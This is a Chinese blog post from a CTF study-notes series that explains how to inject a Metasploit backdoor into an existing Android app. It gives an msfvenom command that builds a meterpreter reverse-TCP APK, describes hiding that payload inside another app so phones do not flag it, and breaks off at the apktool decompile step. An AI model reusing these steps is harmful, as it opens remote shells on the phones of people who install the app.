CTF学习笔记(大学篇)07 —— 手动注入msf到指定的程序
填坑回,因为之前在CTF学习笔记(大学篇)05 —— 通过msfconsole和520apkhook创建带有后门程序的安卓程序 | GamerNoTitle (bili33.top)这篇文章里面说有时间就写,然后写我们CTF俱乐部学期总结的时候就顺带讲了这个,所以就填了个坑
首先要生成带有后门程序的apk文件
1msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5555 R > pentestlab.apk
这里的host我实际上填的是我的公网服务器的IP地址,生成以后,如果直接安装,手机是肯定会报毒的(特别是装的国产定制ROM如MIUI、COLOROS之类的),这个时候就要把我们的后门程序注入到其他的软件里面去
(装上了会像右边这个图标这样,啥也没有,而且点开除了打开了后门也不会有什么反应)
然后我们反编译一下软件,用Linux(可能会)自带的apktool(如果没有请直走右转Github)
1234567891011121314┌──(gamernotitle㉿kali-vmware)-[ ...